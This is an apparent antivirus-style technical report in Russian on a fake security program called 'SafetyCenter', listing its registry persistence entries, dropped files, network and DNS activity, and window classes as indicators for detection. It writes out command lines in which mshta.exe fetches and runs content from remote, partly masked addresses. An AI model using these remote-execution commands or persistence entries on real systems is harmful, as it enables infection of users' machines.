Техническая информация
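Изменения в реестре:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'SafetyCenter' = '%PROGRAM_FILES%\SafetyCenter\start.exe'
- [<HKLM>\SOFTWARE\Classes\CLSID\{459b6bf8-5320-4c41-8833-85baedf31086}\Shell\Open\Command] '' = '%PROGRAM_FILES%\SafetyCenter\protector.exe'
Запись в RunOnce обеспечивает запуск start.exe при следующем входе в систему; пустое имя параметра в Shell\Open\Command означает значение по умолчанию, то есть protector.exe назначен командой «Открыть» для указанного CLSID.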
Командные строки запуска (mshta.exe с удалённым адресом в качестве аргумента):
- '<SYSTEM32>\mshta.exe' http://ur###nam.net/8732489273.php
- '<SYSTEM32>\mshta.exe' http://21#.#17.160.18/install.php?id#
Имена пользовательских процессов (в тексте не указано, что именно образец с ними делает):
- ICQ.exe
- firefox.exe
Пути к файлам:
- %PROGRAM_FILES%\SafetyCenter\new.exe
- %PROGRAM_FILES%\SafetyCenter\start.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\8732489273[1].php
- %PROGRAM_FILES%\SafetyCenter\uninstall.exe
- %PROGRAM_FILES%\SafetyCenter\protector.exe
- %PROGRAM_FILES%\SafetyCenter\sound.wav
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\install[1].php
- %PROGRAM_FILES%\SafetyCenter\tst.exe
- %PROGRAM_FILES%\SafetyCenter\main.ico
Файлы 8732489273[1].php и install[1].php в Temporary Internet Files по именам совпадают с адресами, переданными mshta.exe, то есть, по-видимому, это кэшированные копии загруженных страниц.
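Сетевая активность (узел:порт, запрошенные адреса, DNS-запросы):
- 'localhost':1037
- 'ur###nam.net':80
- 'localhost':1035
- '21#.#17.160.18':80
- ur###nam.net/8732489273.php
- 21#.#17.160.18/install.php?id#
- DNS ASK ur###nam.net
Символы «#» в именах узлов и адресах, по-видимому, скрывают часть значения; в таком виде эти строки не годятся для точного сопоставления в журналах прокси или DNS.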
Окна (класс и заголовок; в тексте не указано, создаёт ли образец эти окна или ищет их):
- ClassName: 'HTML Application Host Window Class' WindowName: 'c71e7a0f-e634-4e08-8a6e-64709a09dd18'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'TForm1' WindowName: 'Safety Center'